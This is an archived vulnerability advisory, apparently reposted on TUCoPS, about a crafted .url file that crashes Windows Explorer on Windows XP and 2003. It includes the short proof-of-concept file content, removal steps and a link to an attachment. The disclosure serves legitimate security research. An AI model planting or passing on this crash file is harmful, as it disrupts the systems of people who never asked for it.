TUCoPS :: Windows :: b06-3450.htm

Windows Explorer URL File format overflow
Windows Explorer URL File format overflow
Windows Explorer URL File format overflow



Windows Explorer URL File format overflow=0D
=0D
=0D
Affected Vendor:=0D
Microsoft =0D
=0D
Affected Products:=0D
WindowsXP ALL=0D
Windows2003 ALL=0D
=0D
=0D
Vulnerability Details:=0D
=0D
When explorer.exe parsing *.url file which contains a url as follows format will cause explorer.exe crash.=0D
=0D
=0D
=0D
=0D
if you create the Exploit.url on Desktop=0D
=0D
Explorer will Crash...Crash...Crash...Crash...Crash...Crash...=0D
=0D
=0D
if you will del exploit.url=0D
open taskmgr.exe=0D
open cmd.exe=0D
=0D
then cd your desktop=0D
=0D
del exploit.url=0D
=0D
=0D
=0D
=0D
Exploit:=0D
=0D
[InternetShortcut]=0D
url=file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:=0D
=0D
=0D
Attachment:=0D
http://hitcon.org/Nanika-desktop_explore_0day.rar=0D 
you can drop in desktop :P=0D
=0D
=0D
http://hitcon.org=0D 
http://www.chroot.org 

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH